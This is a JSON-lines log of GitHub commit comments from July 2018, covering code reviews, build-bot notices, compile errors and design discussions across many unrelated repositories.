{"id":"7915883713","type":"CommitCommentEvent","actor":{"login":"msgilligan"},"repo":{"name":"jview/consensusj"},"payload":{"comment":{"id":29589186,"position":null,"line":null,"path":null,"commit_id":"65b584d58a86c82c91d6de334a17aead796da489","created_at":"2018-07-04T02:23:04Z","updated_at":"2018-07-04T02:23:04Z","author_association":"NONE","body":"This is fixed upstream: https://github.com/ConsensusJ/consensusj/commit/556f2fd81e25877eac47d6b99aee400c30bef6a6"}},"created_at":"2018-07-04T02:23:04Z"}
{"id":"7915901511","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29589220,"position":null,"line":null,"path":null,"commit_id":"d7c7c10dcc5a1572da388c73148d2c2abebc2aa5","created_at":"2018-07-04T02:30:22Z","updated_at":"2018-07-04T02:30:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180704-023021 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180704-023021\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-04T02:30:22Z"}
{"id":"7915902617","type":"CommitCommentEvent","actor":{"login":"calvinwoo"},"repo":{"name":"calvinwoo/bloom-frontend"},"payload":{"comment":{"id":29589222,"position":3,"line":11,"path":"src/components/HomePage/index.js","commit_id":"c70cd75cebfc736a8c3b4210ba89cc116660d6df","created_at":"2018-07-04T02:30:49Z","updated_at":"2018-07-04T02:30:49Z","author_association":"OWNER","body":"When search is \"active\", the class of this `div` becomes `home-page active`."}},"created_at":"2018-07-04T02:30:49Z"}
{"id":"7915905852","type":"CommitCommentEvent","actor":{"login":"parrotgeek1"},"repo":{"name":"mariogamer2/Atmosphere"},"payload":{"comment":{"id":29589230,"position":5,"line":32,"path":"stratosphere/loader/source/ldr_npdm.cpp","commit_id":"406fa36a525fdd0186e0a6e86e9c8aff03e22ed0","created_at":"2018-07-04T02:32:07Z","updated_at":"2018-07-04T02:32:07Z","author_association":"NONE","body":"it's == and no quotes, oh and put 0x at the beginning \r\n\r\nbut honestly, don't try this if you don't even know C"}},"created_at":"2018-07-04T02:32:07Z"}
{"id":"7915908172","type":"CommitCommentEvent","actor":{"login":"goku1004"},"repo":{"name":"zskyfall/anhemdatdeo"},"payload":{"comment":{"id":29589236,"position":1,"line":1,"path":"index.html","commit_id":"02355e40de78094945f748508bc69875ee603085","created_at":"2018-07-04T02:33:05Z","updated_at":"2018-07-04T02:33:05Z","author_association":"NONE","body":"4 thang kia an cut"}},"created_at":"2018-07-04T02:33:05Z"}
{"id":"7915908608","type":"CommitCommentEvent","actor":{"login":"calvinwoo"},"repo":{"name":"calvinwoo/bloom-frontend"},"payload":{"comment":{"id":29589237,"position":7,"line":7,"path":"src/components/HomePage/styles.css","commit_id":"c70cd75cebfc736a8c3b4210ba89cc116660d6df","created_at":"2018-07-04T02:33:18Z","updated_at":"2018-07-04T02:33:18Z","author_association":"OWNER","body":"I'm using a tool that has nesting. The `&` means that the current selector will be appended to the parent.\r\n\r\nFor example, the tool translates this section into:\r\n```\r\n.home-page {\r\n  transition: all 0.3s;\r\n  padding: 24px;\r\n}\r\n\r\n.home-page .top-content {\r\n  transition: inherit;\r\n}\r\n\r\n.home-page .logo {\r\n  etc...\r\n```"}},"created_at":"2018-07-04T02:33:18Z"}
{"id":"7915915089","type":"CommitCommentEvent","actor":{"login":"aksr"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29589246,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-04T02:35:57Z","updated_at":"2018-07-04T02:35:57Z","author_association":"NONE","body":"Neither `neatcc` nor `neatroff_make` is required.\r\nJust `tmac` macros directory from `neatroff_make` repository."}},"created_at":"2018-07-04T02:35:57Z"}
{"id":"7915916805","type":"CommitCommentEvent","actor":{"login":"elemgee"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":29589248,"position":null,"line":null,"path":null,"commit_id":"5af47fae17526fa5e53d56d5c7c281ba1761e85b","created_at":"2018-07-04T02:36:40Z","updated_at":"2018-07-04T02:36:40Z","author_association":"CONTRIBUTOR","body":"Unless you wanted a copy... or a clone for some reason\nYes, mutableclone makes more sense, but i was surprised that the method didn’t actually make a clone. I don’t know that it would ever be an issue other than semantically, but if you wanted “this” wouldn’t you ask for “this” and if (for whatever reason) you asked for a clone, it would not appear to be optimal or predictable to give the same object back. \n\n\n\n\n=====================\nLarry Mills-Gahl\n\n> On Jul 3, 2018, at 2:58 PM, Chuck Hill <notifications@github.com> wrote:\n> \n> It makes no sense to “clone” an immutable object by creating a new instance. Clone is only meaningful with a mutable object.  I guess you could call it an optimization. \n> \n> Chuck \n> \n> From: Larry Mills-Gahl <notifications@github.com> \n> Reply-To: wocommunity/wonder <reply@reply.github.com> \n> Date: Tuesday, July 3, 2018 at 12:50 PM \n> To: wocommunity/wonder <wonder@noreply.github.com> \n> Cc: Subscribed <subscribed@noreply.github.com> \n> Subject: Re: [wocommunity/wonder] Add collectors for NSCollection types (5af47fa) \n> \n> \n> Henrique, \n> I have a question that is tangental to the collectors class here, but it came up because my compile of this was complaining that NSArray didn't implement immutable clone (when clearly it does). I'm sure that is an issue with my build environment, so that's not really the problem. \n> \n> My question is about cloning and why the NSArray class in EREXtensions returns \"this\" for clone and immutable clone. I know that's not your code, but your the smartest guy I know related to this question, so I'm wondering how something can be a clone of itself. \n> The code from NSArray is: \n> \n> @Override \n> \n> public Object clone() { \n> \n> return this; \n> \n> } \n> \n> \n> \n> public NSArray<E> immutableClone() { \n> \n> return this; \n> \n> } \n> \n> Is this an optimization relying on the idea that it's immutable so nobody would care if it were the same object? \n> \n> This should be obvious but because I don't necessarily trust myself, I tried a little test to check my logic and this appears to show NSArray not actually making a clone when you ask for one. \n> \n> val a = new NSArray[String]( \"a\", \"b\", \"c\" ) //> a : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\") \n> \n> \n> \n> val b = a.immutableClone() //> b : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\") \n> \n> \n> \n> val c = new NSArray[String](a) //> c : com.webobjects.foundation.NSArray[String] = (\"a\", \"b\", \"c\") \n> \n> \n> \n> System.identityHashCode(a) //> res0: Int = 1204167249 \n> \n> System.identityHashCode(b) //> res1: Int = 1204167249 \n> \n> System.identityHashCode(c) //> res2: Int = 1047503754 \n> \n> — \n> You are receiving this because you are subscribed to this thread. \n> Reply to this email directly, view it on GitHub<https://github.com/wocommunity/wonder/commit/5af47fae17526fa5e53d56d5c7c281ba1761e85b#commitcomment-29586234>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAAMb_KRkJgRTPLVBSQrSt7kDOZxrMi_ks5uC8rtgaJpZM4VBiJP>. \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-04T02:36:40Z"}
{"id":"7915920808","type":"CommitCommentEvent","actor":{"login":"Bill0106"},"repo":{"name":"Bill0106/site-backend"},"payload":{"comment":{"id":29589258,"position":16,"line":16,"path":"service/game.go","commit_id":"4669fc9fa963b21646284b7c830e3fbac0b382f1","created_at":"2018-07-04T02:38:24Z","updated_at":"2018-07-04T02:38:24Z","author_association":"OWNER","body":"这个是只能查询Games的列表，我想的是写一个通用的方法去查询所有数据表的list，用json进行序列化"}},"created_at":"2018-07-04T02:38:24Z"}
{"id":"7915920835","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"matiascondem/CapacitacionLIFIAGrupo6"},"payload":{"comment":{"id":29589259,"position":null,"line":null,"path":null,"commit_id":"f999121fb973e32ea32e3858c696c155c45d2545","created_at":"2018-07-04T02:38:25Z","updated_at":"2018-07-04T02:38:25Z","author_association":"COLLABORATOR","body":"1) Les comento porque no pudieron ir la clase pasada, yo mañana no puedo ir a clases así que les voy a revisar los tests a todos mis grupos y darles algunos consejos. Cualquier cosa mañana hablan con jony que sí va. O me escriben por acá o mail y eventualmente responderé.\r\n2) Un commit cambiando 28 archivos mmmmmmmmmmmmmmmmmmmm no es buena idea. A parte no son 28 archivos de testing que ahí podría tener quizás alguna justificación. \r\n3) Bien haciendo tests. Tengan en cuenta que MUY probablemente va a haber una entrega sobre esto. \r\n4) NOOOO me dejen esos tests assert true por favor. A ustedes les ocupa espacio y da una falsa impresión. Acá bueno es la capacitación, pero en un laburo ni se les ocurra subir ese tipo de cosas por favor!!!\r\n5) Nombre de la clase poco claro. AppTest... \r\n6) Qué tipo de tests son? armen mínimamente una carpeta para los de unidad y otra para los de integración por favor. \r\n7) public class AppTest   extends TestCase  Recuerden que como usan Junit5 (>=4) no necesitan heredar explícitamente de TestCase entre otras ventajas dadas en clase. \r\n8) Muy bien usando Java doc ;)!\r\n9) @SuppressWarnings(\"deprecation\") no se por qué está \r\n10) con ponele @Test a testCreateNormalUser sale andando\r\n11)La creación del user SÓLO implica verificar que no sea nulo y que el nombre es el que le dieron al crearlo?\r\n No \"testea profundamente el caso\". Me explico acá solo se fijan esas dos cosas. Podrían verificar la reación con ditintos métodos, parámetros, fijarse todos los valores, etc. Tengan cuidado porque es el error más común je :P \r\n12) Les recuerdo/advierto para próximos momentos:\r\nojo que al inicializar usando el @BeforeEach incializan todo una y otra vez antes de los tests. Hay casos en los que tiene sentido por ej para \"limpiar\" una instancia entre ejecuciones de distintos tests y  hay casos en los que no porque no cambian y se genera un trabajo al instancia de nuevo una y otra vez lo mismo innecesario. Tengan cuidado, nada más :)\r\n13) Recuerden que pueden hacer jerarquías de tests, que pueden llamar métodos privados internos de la clase, etc ;) \r\n14) Si van a testar al usuario pueden hacer muchas cosas, pero van por buen camino. Sigan así! :D \r\nasí se aprende, haciendo ;) "}},"created_at":"2018-07-04T02:38:25Z"}
{"id":"7915921640","type":"CommitCommentEvent","actor":{"login":"juddus"},"repo":{"name":"HandsFree/beaconing-teacher-ui"},"payload":{"comment":{"id":29589262,"position":9,"line":13,"path":"frontend/src/modules/calendar/root/calendar/index.js","commit_id":"e270b7a7edb6d7bc5690a1f75cd8d0cbbf8c0607","created_at":"2018-07-04T02:38:47Z","updated_at":"2018-07-04T02:38:47Z","author_association":"MEMBER","body":"This is a sub nav specifically for classroom. \r\nIt has the hyperlinks for classroom on them. \r\n\r\nThis now means that clicking these links in the calendar takes you to the classroom instead.\r\n\r\nYou need to make a custom version of the `inner_nav.js` for the calendar.\r\nYou can just copy the `inner_nav.js` file for classroom and change the hyperlinks to the ones needed."}},"created_at":"2018-07-04T02:38:47Z"}
{"id":"7915928134","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29589275,"position":null,"line":null,"path":null,"commit_id":"51346726a3e7032bcf385f7b62a32c478107b205","created_at":"2018-07-04T02:41:30Z","updated_at":"2018-07-04T02:41:30Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.201`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/201) :tada:"}},"created_at":"2018-07-04T02:41:30Z"}
{"id":"7915931243","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29589278,"position":null,"line":null,"path":null,"commit_id":"51346726a3e7032bcf385f7b62a32c478107b205","created_at":"2018-07-04T02:42:45Z","updated_at":"2018-07-04T02:42:45Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.304`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/399842281) :tada:"}},"created_at":"2018-07-04T02:42:45Z"}
{"id":"7915934071","type":"CommitCommentEvent","actor":{"login":"jankjn"},"repo":{"name":"Bill0106/site-backend"},"payload":{"comment":{"id":29589283,"position":16,"line":16,"path":"service/game.go","commit_id":"4669fc9fa963b21646284b7c830e3fbac0b382f1","created_at":"2018-07-04T02:43:59Z","updated_at":"2018-07-04T02:43:59Z","author_association":"COLLABORATOR","body":"soga, 我看你里面写了 models.Games我以为就查个 games"}},"created_at":"2018-07-04T02:43:59Z"}
{"id":"7915936805","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29589289,"position":null,"line":null,"path":null,"commit_id":"e5bd810b1dd9e2d93e43080478d8484e14fe5fe1","created_at":"2018-07-04T02:45:07Z","updated_at":"2018-07-04T02:45:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180704-024506 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180704-024506\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-04T02:45:07Z"}
{"id":"7915937990","type":"CommitCommentEvent","actor":{"login":"q00u"},"repo":{"name":"jaredkaczynski/SalienCheat"},"payload":{"comment":{"id":29589293,"position":null,"line":null,"path":null,"commit_id":"5f5b8a96a8ab82bb1f572a67470f391309efafc7","created_at":"2018-07-04T02:45:35Z","updated_at":"2018-07-04T02:45:35Z","author_association":"NONE","body":"```\r\nraceback (most recent call last):\r\n  File \"cheat.py\", line 651, in <module>\r\n    full_response = game.report_boss_damage(heal,1);\r\n  File \"cheat.py\", line 479, in report_boss_damage\r\n    return self.spost('ITerritoryControlMinigameService/ReportBossDamage', {'dam\r\nage_to_boss': damage,'damage_taken':0,'use_heal_ability':heal})\r\n  File \"cheat.py\", line 133, in spost\r\n    return rdata\r\nUnboundLocalError: local variable 'rdata' referenced before assignment\r\n```"}},"created_at":"2018-07-04T02:45:35Z"}
{"id":"7915938561","type":"CommitCommentEvent","actor":{"login":"gyunker"},"repo":{"name":"cde/EventSearcher"},"payload":{"comment":{"id":29589294,"position":null,"line":null,"path":null,"commit_id":"ffb42f9cb790d913da63a52099dfc93b4c771df8","created_at":"2018-07-04T02:45:50Z","updated_at":"2018-07-04T02:45:50Z","author_association":"COLLABORATOR","body":"Looks great"}},"created_at":"2018-07-04T02:45:50Z"}
{"id":"7915942595","type":"CommitCommentEvent","actor":{"login":"brycepg"},"repo":{"name":"PyCQA/astroid"},"payload":{"comment":{"id":29589297,"position":null,"line":null,"path":null,"commit_id":"9cc0b8a1275418f51fb305c7da1be938abad3e4e","created_at":"2018-07-04T02:47:31Z","updated_at":"2018-07-04T02:47:31Z","author_association":"MEMBER","body":"Note: this was due to exception values being inferred correctly from da12d5011db32e5b76fac9a3a5c76800326038cd since EmptyNode doesn't have ClassDef attributes"}},"created_at":"2018-07-04T02:47:31Z"}
{"id":"7915944419","type":"CommitCommentEvent","actor":{"login":"motss"},"repo":{"name":"kelektiv/node.bcrypt.js"},"payload":{"comment":{"id":29589299,"position":null,"line":null,"path":null,"commit_id":"a78d381b748b49ded79957a35c9d56be42f0fa57","created_at":"2018-07-04T02:48:18Z","updated_at":"2018-07-04T02:48:18Z","author_association":"NONE","body":"@agathver Why not `^` instead of locking deep version?"}},"created_at":"2018-07-04T02:48:18Z"}
{"id":"7915948734","type":"CommitCommentEvent","actor":{"login":"guangxiong"},"repo":{"name":"guangxiong/python-text1"},"payload":{"comment":{"id":29589302,"position":null,"line":null,"path":null,"commit_id":"2f1795ce5ccaccedf525a3764b5f3ade06f91564","created_at":"2018-07-04T02:49:49Z","updated_at":"2018-07-04T02:49:49Z","author_association":"OWNER","body":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#题目：有四个数字：1、2、3、4，能组成多少个互不相同且无重复数字的三位数？各是多少？\r\nn , m = 0 , 0\r\nfor i in range(1,5):\r\n    for j in range(1,5):\r\n        for k in range(1,5):\r\n            n+=1\r\n            if (i != j) and (i != k) and (j != k):\r\n                print (i,j,k)\r\n                m+=1\r\nprint(\"一共有{0}个数，其中满足条件的有{1}个\".format(n, m))"}},"created_at":"2018-07-04T02:49:49Z"}
{"id":"7915950848","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"matiascondem/CapacitacionLIFIAGrupo6"},"payload":{"comment":{"id":29589306,"position":null,"line":null,"path":null,"commit_id":"1947364ca15bc2d68ef40d28da90dcde501aa84e","created_at":"2018-07-04T02:50:36Z","updated_at":"2018-07-04T02:50:36Z","author_association":"COLLABORATOR","body":"1) En vez de dar tanta vuelta con las excepciones pueden directamente atraparlas en un assertThrows y queda mucho más limpio. Les dejo link a la documentación para que vean todos, dentro de esos hay 3 de los que dije, fijaos \r\nhttps://junit.org/junit5/docs/5.0.1/api/org/junit/jupiter/api/Assertions.html\r\n2) Recuerden que pueden usar anotaciones como @BeforeAll @BeforeEach etc  para inicializar.  \r\n3) Buenísimo que pureben casos de error y que levanten sus propias excepciones! excelente trabajo con eso! :D \r\n4) testCreateRestaurant no testean lo miso que el otro osea la semántica cambia antes un nombre similar... mal ahí. \r\n5) OJO! que al usar el equals entre objetos ese equals se fija si son la misma instancia en memoria... \r\nEJ en  Assert.assertEquals(restaurant, Ratatoullie.getInstance().getUserController().getAllRestaurantsCreatedByUser(\"responsable\").get(0));\r\nhttps://user-images.githubusercontent.com/5290384/42253123-8e3b56ba-7f16-11e8-9a68-b8087e9c6429.png\r\nEn definitiva está mal... en primera instancia ustedes no quieren comprar eso. Obviamente indirectamente sí cumple con el caso y les sirve pero... y si son objetos iguales y para ustedes son \"iguales\" aunque son instancias distintas?\r\n6) A meterle con ganas que tienen muchas cosas para destacar! y traten de no faltar mañana por favor. Son teorías importantes a futuro las de esta semana y les explica mucho de qué van  a hacer, por qué, y cómo porque tiramos tips y demás. Suerte!"}},"created_at":"2018-07-04T02:50:36Z"}
{"id":"7915954760","type":"CommitCommentEvent","actor":{"login":"laruence"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29589312,"position":null,"line":null,"path":null,"commit_id":"ef9ed19ec7f141311feea1d42467f5773cfc09bc","created_at":"2018-07-04T02:52:10Z","updated_at":"2018-07-04T02:52:10Z","author_association":"MEMBER","body":"Any idea how to fix this?\r\n````\r\next/dom/.libs/document.o: In function `zif_dom_document_save_html':\r\n/home/huixinchen/opensource/trunk/ext/dom/document.c:2191: undefined reference to `xmlOutputBufferGetSize'\r\n/home/huixinchen/opensource/trunk/ext/dom/document.c:2201: undefined reference to `xmlOutputBufferGetSize'\r\n/home/huixinchen/opensource/trunk/ext/dom/document.c:2204: undefined reference to `xmlOutputBufferGetContent'\r\n````"}},"created_at":"2018-07-04T02:52:10Z"}
{"id":"7915958261","type":"CommitCommentEvent","actor":{"login":"syl20bnr"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":29589318,"position":null,"line":null,"path":null,"commit_id":"5e4fc983fbc6d35ba1c865de2cf2ba7206d83bb9","created_at":"2018-07-04T02:53:33Z","updated_at":"2018-07-04T02:53:33Z","author_association":"CONTRIBUTOR","body":" I thought it was a joke first 😂 "}},"created_at":"2018-07-04T02:53:33Z"}
{"id":"7915961176","type":"CommitCommentEvent","actor":{"login":"laruence"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29589321,"position":null,"line":null,"path":null,"commit_id":"ef9ed19ec7f141311feea1d42467f5773cfc09bc","created_at":"2018-07-04T02:54:44Z","updated_at":"2018-07-04T02:54:44Z","author_association":"MEMBER","body":"okey, seems my libxml is too old... but it is better to add version checking and give a meaning-fulll warning or error? "}},"created_at":"2018-07-04T02:54:44Z"}
{"id":"7915962046","type":"CommitCommentEvent","actor":{"login":"Macho2"},"repo":{"name":"Macho2/Algorithms"},"payload":{"comment":{"id":29589324,"position":null,"line":null,"path":null,"commit_id":"d7fde15cf2a469917ca60e63aff1351f05b68e4e","created_at":"2018-07-04T02:55:06Z","updated_at":"2018-07-04T02:55:06Z","author_association":"OWNER","body":"for testt"}},"created_at":"2018-07-04T02:55:06Z"}
{"id":"7915962740","type":"CommitCommentEvent","actor":{"login":"Macho2"},"repo":{"name":"Macho2/Algorithms"},"payload":{"comment":{"id":29589326,"position":null,"line":null,"path":null,"commit_id":"d7fde15cf2a469917ca60e63aff1351f05b68e4e","created_at":"2018-07-04T02:55:22Z","updated_at":"2018-07-04T02:55:22Z","author_association":"OWNER","body":"for test"}},"created_at":"2018-07-04T02:55:22Z"}
{"id":"7915964193","type":"CommitCommentEvent","actor":{"login":"Linuxrgw"},"repo":{"name":"Linuxrgw/java"},"payload":{"comment":{"id":29589330,"position":29,"line":29,"path":"Spring学习笔记.md","commit_id":"639a523245e087fcb7d6c8d81a9837b1e0eaafce","created_at":"2018-07-04T02:55:56Z","updated_at":"2018-07-04T02:55:56Z","author_association":"OWNER","body":"IOC入门案例 \r\n1 导入jar 包 解压zip文件\r\n2 每个jar 都有三个jar  一个使用，一个文档，一个源码\r\n导入 Beans Core Context  SpEL"}},"created_at":"2018-07-04T02:55:56Z"}
{"id":"7915964686","type":"CommitCommentEvent","actor":{"login":"jonescc"},"repo":{"name":"aodn/geoserver-build"},"payload":{"comment":{"id":29589331,"position":92,"line":139,"path":"src/extension/wps/src/main/java/au/org/emii/wps/GoGoDuckProcess.java","commit_id":"d69752c7d9b067402793018c7905a7b86f72eeb4","created_at":"2018-07-04T02:56:08Z","updated_at":"2018-07-04T02:56:08Z","author_association":"MEMBER","body":"The current gogoduck code for creating the provenance document is here: https://github.com/aodn/aws-wps/blob/master/aggregation-worker/src/main/java/au/org/emii/aggregationworker/AggregationRunner.java#L293\r\n\r\nLooks like it may also have the same problem."}},"created_at":"2018-07-04T02:56:08Z"}
{"id":"7915965579","type":"CommitCommentEvent","actor":{"login":"jayjfletcher"},"repo":{"name":"jayjfletcher/laravel-totem"},"payload":{"comment":{"id":29589333,"position":null,"line":null,"path":null,"commit_id":"bb89033f439b429ceca99c6af79fa5e88914d39c","created_at":"2018-07-04T02:56:28Z","updated_at":"2018-07-04T02:56:28Z","author_association":"OWNER","body":"removed linting, as it has been deprecated"}},"created_at":"2018-07-04T02:56:28Z"}
{"id":"7915967654","type":"CommitCommentEvent","actor":{"login":"jaredkaczynski"},"repo":{"name":"jaredkaczynski/SalienCheat"},"payload":{"comment":{"id":29589335,"position":null,"line":null,"path":null,"commit_id":"5f5b8a96a8ab82bb1f572a67470f391309efafc7","created_at":"2018-07-04T02:57:20Z","updated_at":"2018-07-04T02:57:20Z","author_association":"OWNER","body":"Try again. Apologies."}},"created_at":"2018-07-04T02:57:20Z"}
{"id":"7915967967","type":"CommitCommentEvent","actor":{"login":"jonescc"},"repo":{"name":"aodn/geoserver-build"},"payload":{"comment":{"id":29589336,"position":92,"line":139,"path":"src/extension/wps/src/main/java/au/org/emii/wps/GoGoDuckProcess.java","commit_id":"d69752c7d9b067402793018c7905a7b86f72eeb4","created_at":"2018-07-04T02:57:28Z","updated_at":"2018-07-04T02:57:28Z","author_association":"MEMBER","body":"Actually no - I think parameters includes timeRange"}},"created_at":"2018-07-04T02:57:28Z"}
{"id":"7915969828","type":"CommitCommentEvent","actor":{"login":"jonescc"},"repo":{"name":"aodn/geoserver-build"},"payload":{"comment":{"id":29589337,"position":92,"line":139,"path":"src/extension/wps/src/main/java/au/org/emii/wps/GoGoDuckProcess.java","commit_id":"d69752c7d9b067402793018c7905a7b86f72eeb4","created_at":"2018-07-04T02:58:15Z","updated_at":"2018-07-04T02:58:15Z","author_association":"MEMBER","body":"About time we moved the remaining aggregation code from geoserver-build to aws-wps and deleted it here."}},"created_at":"2018-07-04T02:58:15Z"}
{"id":"7915972200","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29589339,"position":null,"line":null,"path":null,"commit_id":"f564833fda44e715f61fe9c5e34e521a7ddc1882","created_at":"2018-07-04T02:59:15Z","updated_at":"2018-07-04T02:59:15Z","author_association":"CONTRIBUTOR","body":"> No. However, we do not have `revision 0` in Portfiles. If you need to bump the revision number, just add the `revision` back. (That is to say, we never have a line saying `revision 0`, only `revision 1` and above.)\r\n\r\nFor simple ports that have no subports, that's true. But for ports that do have subports, it can be helpful to explicitly and separately state the revision of the main port and each subport even if they are 0. maxima has a maxima-devel subport, so it would not be a bad idea for the main port and the subport to each specify their own revision, so that they could be manipulated independently if needed. This helps prevent mistakes when developers who are less familiar with a port want to revbump it and, not finding an existing `revision` line, insert one near the top of the portfile, perhaps inadvertently affecting all of a port's subports when it was only intended to affect one of them."}},"created_at":"2018-07-04T02:59:15Z"}
{"id":"7915973009","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29589341,"position":null,"line":null,"path":null,"commit_id":"88455b93deeee133149525271950e20bdfbbf425","created_at":"2018-07-04T02:59:36Z","updated_at":"2018-07-04T02:59:36Z","author_association":"NONE","body":"This patch doesn't change that behaviour. At the depth == -1 node bestValue will still be 150, and a score of 0 won't beat that and will thus be rejected. The difference is that because of the relaxed alpha-beta window that 0 might not produce beta cutoffs at the depth == -2 and depth == -4 nodes and so more nodes will be searched.\r\n\r\nFurthermore, I don't agree that 0 should be considered the more 'correct' score anyway. The idea of stand pat is that we assume that even if none of the captures we search can match the static eval, there's probably at least _some_ move available in the position that would (for example, maybe all our captures are failing low because we have a rook en prise, while if we were to search quiets too we'd find that we could simply move the rook out of danger and thus get a score within the window). This is necessary to stabilize the search, and my own local testing in the past at low search depths found that if you prune too many quiets at low depths (qsearch being a degenerate case where _all_ non-checking quiets are pruned unconditionally) you actually end up with severe pathology (cases where a reduced depth frequently gets a more accurate result than a higher depth) and substantially lower ELO in fixed depth searches than if you were to stand pat at these low depth nodes."}},"created_at":"2018-07-04T02:59:36Z"}
{"id":"7919938605","type":"CommitCommentEvent","actor":{"login":"cnrdmrci"},"repo":{"name":"cnrdmrci/MVC-Codeigniter-"},"payload":{"comment":{"id":29599167,"position":null,"line":null,"path":null,"commit_id":"6e3dd5b9837e989243e249e4a28cef2d5d876940","created_at":"2018-07-04T20:00:17Z","updated_at":"2018-07-04T20:00:17Z","author_association":"OWNER","body":"e mail benim değil öylesine.."}},"created_at":"2018-07-04T20:00:17Z"}
{"id":"7919942598","type":"CommitCommentEvent","actor":{"login":"shalinshah1993"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29599174,"position":7,"line":238,"path":"pom.xml","commit_id":"24521206cabbb4058408fc389e62892db70a353c","created_at":"2018-07-04T20:01:44Z","updated_at":"2018-07-04T20:01:44Z","author_association":"OWNER","body":"How is maven finding this library without it being in the maven central?"}},"created_at":"2018-07-04T20:01:44Z"}
{"id":"7919950016","type":"CommitCommentEvent","actor":{"login":"llinkz"},"repo":{"name":"llinkz/directTDoA"},"payload":{"comment":{"id":29599182,"position":null,"line":null,"path":null,"commit_id":"90049bcaf27802ffe4e4c097f346d9e4b7e930b6","created_at":"2018-07-04T20:04:38Z","updated_at":"2018-07-04T20:04:38Z","author_association":"OWNER","body":"This is the default .cfg file for directTDoA\r\n* map boundaries to Europe\r\n* display all nodes on the map\r\n* no favorites nodes\r\n* no blacklisted nodes"}},"created_at":"2018-07-04T20:04:38Z"}
{"id":"7919950855","type":"CommitCommentEvent","actor":{"login":"AllTheCode"},"repo":{"name":"AllTheCode/MagicSpells"},"payload":{"comment":{"id":29599185,"position":null,"line":null,"path":null,"commit_id":"30b0ab64879bbb98bf70217a63108ea6bfa201d8","created_at":"2018-07-04T20:04:58Z","updated_at":"2018-07-04T20:04:58Z","author_association":"OWNER","body":"Don't know why it messed with the last line there."}},"created_at":"2018-07-04T20:04:58Z"}
{"id":"7919951234","type":"CommitCommentEvent","actor":{"login":"flexopecs"},"repo":{"name":"flexopecs/hello-world"},"payload":{"comment":{"id":29599189,"position":null,"line":null,"path":null,"commit_id":"ea9a2318894b2d9e34cb8594e61c36406102cef1","created_at":"2018-07-04T20:05:08Z","updated_at":"2018-07-04T20:05:08Z","author_association":"OWNER","body":"added a little bit about myself"}},"created_at":"2018-07-04T20:05:08Z"}
